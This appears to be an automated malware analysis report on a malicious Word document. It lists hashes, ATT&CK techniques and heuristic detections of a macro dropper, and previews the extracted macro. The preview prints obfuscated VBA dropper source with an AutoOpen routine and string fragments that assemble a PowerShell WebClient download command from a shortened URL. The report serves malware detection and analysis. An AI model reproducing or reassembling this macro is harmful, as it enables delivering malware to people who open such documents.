Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2dffd9b326bda42a…

MALICIOUS

Office (OLE)

128.0 KB Created: 2018-02-13 07:37:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: d0247ac392bb756d33303ac94d551272 SHA-1: e84e8acf530cf9a87fc810fa67cc98dd1fc785ad SHA-256: 2dffd9b326bda42aca5c5e1473c63fbca0263202b214bf109ca0d7b379c9fe8b
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical indicator of malicious intent, to execute commands. The presence of the AutoOpen macro and the Shell() call strongly suggests the document is designed to download and execute a secondary payload, characteristic of a dropper malware.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6447443-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6447443-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25640 bytes
SHA-256: 53d6a4e6727c9c6a23659e2a28e8f7c891c295f88980a30572171aa8d1b194fa
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "RolhNhBAlzU"
Sub AutoOpen()
On Error Resume Next
IbURopAzO = akFUiqiM - Sgn(TzWwsT) - (4474466 - Tan(1794515) / 2949476 - ChrW(uCKroRUMG))
mjnFXzuaz = dOawDAtlcbzRj - Sgn(WUWQsRDKiXa) - (6885182 - Tan(6124476) / 8869310 - ChrW(wwtXOmPTEGrujr))
kIUACiDcd = irSjCYTUzm - Sgn(dEtRwGASJ) - (132330 - Tan(4424063) / 4420376 - ChrW(uOFjdLv))
Application.Run "zjQNSRGUD", fXXANvLzJcImw
WULpWTfRf = XutNGEaiEcCJ - Sgn(hLUzpnT) - (6886681 - Tan(8293372) / 7781168 - ChrW(HJsEvfbjnWdc))
dFnKiBZjt = AiiBTp - Sgn(MDjGCGzMW) - (7569835 - Tan(4813459) / 122655 - ChrW(WzDiruC))
doiRFzuIO = tLlGaSzVb - Sgn(qwHNAiaqDavKZn) - (9974679 - Tan(4545403) / 4044589 - ChrW(AELozw))
End Sub
Function fXXANvLzJcImw()
On Error Resume Next
CcaNATYidf = OnMsTj - Sgn(rwsrk) - (5486110 - Tan(5093109) / 7059333 - ChrW(LFVI))
cNGMGhzuqw = smJUsijZUB - Sgn(MIULt) - (4837791 - Tan(5971870) / 2773271 - ChrW(PtLf))
KNSfsVGqTh = fiG - Sgn(WQv) - (8630177 - Tan(6915529) / 4309376 - ChrW(CYb))
JizdMFPjcw = EUXmkqhFzmb + Mid(CWiOXjwGRz + "LidfOWVZShPkuFYurzCNTW+fTWnPf;nP'+'f+nPf'+'HanPf'+'+nPfsYnPf+nP'+'fYU = .(nP'+'f+nPfYnPf+nPfzWnn'+'PfTW+fTWf+nP'+'fe0Oi+0OinPf'+'+'+'nPfYzWnPf+nPf+YzWnPfTW+fTWf+nPfwYnPf+nPfzWnPf+'+'Dcjtzhj" + PGrDXlHIrFhVRB, 21, 162)
jCuMtWVHIjz = TMwdYwkRT - Sgn(zLrADIhz) - (3202689 - Tan(3815573) / 181781 - ChrW(KchpjpnqT))
IjVTNlJV = YYEOJvti - Sgn(MDwI) - (2608365 - Tan(3795490) / 7320477 - ChrW(wUTiHdrC))
VwKKULaYI = vjPvidE - Sgn(mTvozlDmN) - (7724380 - Tan(4709260) / 2757731 - ChrW(UVzSoWz))
KZaZqKR = YSdriXU + Mid(YLma + "Inp.it/Ue8J/?hnPf+nijqDwWczoKYc" + BQwb, 4, 16)
iiBtmh = EkWY - Sgn(bJltXBFzWl) - (8726330 - Tan(4133450) / 1321830 - ChrW(pojuWFuYpYw))
tfksYzGiu = jtUmzEbIHqwWYs - Sgn(VROirLsASUq) - (9973589 - Tan(3710233) / 7482904 - ChrW(TNw))
HwVohNMaYSB = SMdjootwc - Sgn(rNVdVZHbqElqtC) - (3449523 - Tan(1345453) / 920872 - ChrW(VEWj))
MkWQzrWsjW = QuNMpAKOLiarh + Mid(AqiziPvup + "zilJVRijDnzuHHPAnPf+YnPf+fTW+f'+'TWnPfz0O'+'i+'+'0OiW-nPf+nPfobjectYznPf+nPfW)nPf+nPf nPf+nPfSynPf+nP0Oi+0OifsnPf+nP'+'ftenPf+nPfm.NenPf+nPft.WnPf+nPftlbccLYTZbJE" + nzbNRcp, 17, 134)
AIjwjH = DwhaCzGY - Sgn(rbKmiKIJf) - (2519606 - Tan(6715200) / 1724576 - ChrW(ERPsJMkrZSVwSw))
fiSkT = UpYkPBbzHv - Sgn(bTO) - (9379955 - Tan(9085166) / 737664 - ChrW(GuQKKo))
pTfYzNJUZXp = ojSJppQLcopow - Sgn(wcSIwIlQdcWRh) - (2287181 - Tan(889979) / 2945170 - ChrW(fkpbS))
dljEQLQLIs = zZXshZtzMPB + Mid(HUWzNvrWr + "tjiArNUtYzW) nPf+nPfra'+'ndomnPf+fGrNvOOzw" + cTaRhjlcYbIm, 8, 27)
kUEdBI = DIRdT - Sgn(prXVZDVPL) - (2167696 - Tan(352708) / 7486502 - ChrW(HSEfDM))
CwsAS = CuwjIdv - Sgn(DwEjwVNVInzCTW) - (2285495 - Tan(9478260) / 509576 - ChrW(wWswdNR))
ILaONMm = auuqNwHYMPGVow - Sgn(wvrFKAfjzdnjZ) - (916825 - Tan(938286) / 3743069 - ChrW(OwuSaSaBuvKw))
jqaiaWnc = pSFkPqZH + Mid(FWKR + "VTKVmodOjdFHd'Pf)fTW) -Cr0Oi+0OiEPLAce  fT'+'WE7kfTW'+',[chaR]124  -rePlA0Oi+0OiCE ([chaR]102+[chaR]970Oi+0Oi+[ch0Oi+0OiaR]117),[chaR]36  -CrEPLAce  ('rQ" + CNjJXFpmXIEHNi, 14, 138)
mGmcwpMTI = IjzJBiiHzzHfFA - Sgn(MbDAZZqwzZZ) - (3707154 - Tan(596483) / 8437425 - ChrW(aYmPRjkKFNhzp))
GwLXUvrabUa = UqX - Sgn(TDdRljX) - (3476842 - Tan(6461288) / 9640262 - ChrW(cPfPFZispiB))
PczaHjflOQ = QznsaAzij - Sgn(Bjo) - (3317777 - Tan(1637689) / 7481618 - ChrW(szB))
YPDLo = jfAbvClHHzuLv + Mid(ZPiTH + "UTQcWlrZUPGv+nPfnfTW+fTWvnPf+nPfoYfTW+fTWzWnPf+nPf+nPf+nPfYzWkYzWnPf+n0Oi+0OiPf+nPf+nPfYzWnPf+nPfenPf+nPf-ItnPf+nPfemYzW)(HasnPf+ZkavwNBXAvsawjUoSujqaM" + QHpBcVdREPEUmJ, 13, 117)
hAqPOTjm = ooU - Sgn(ppPWslTTSMEo) - (7681878 - Tan(2369396) / 9178892 - ChrW(RTcClGJzKq))
kbZQmr = lzRn - Sgn(wKBHCObO) - (1413840 - Tan(8905767) / 5721281 - ChrW(jcHcBB))
mFwwU = VMSDjjSLBc - Sgn(TAZjqdKofD) - (8496676 - Tan(2703705) / 9013068 - ChrW(cvNhjfkwiSLj))
szCOmjic = bdwCkkbmziiR + 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.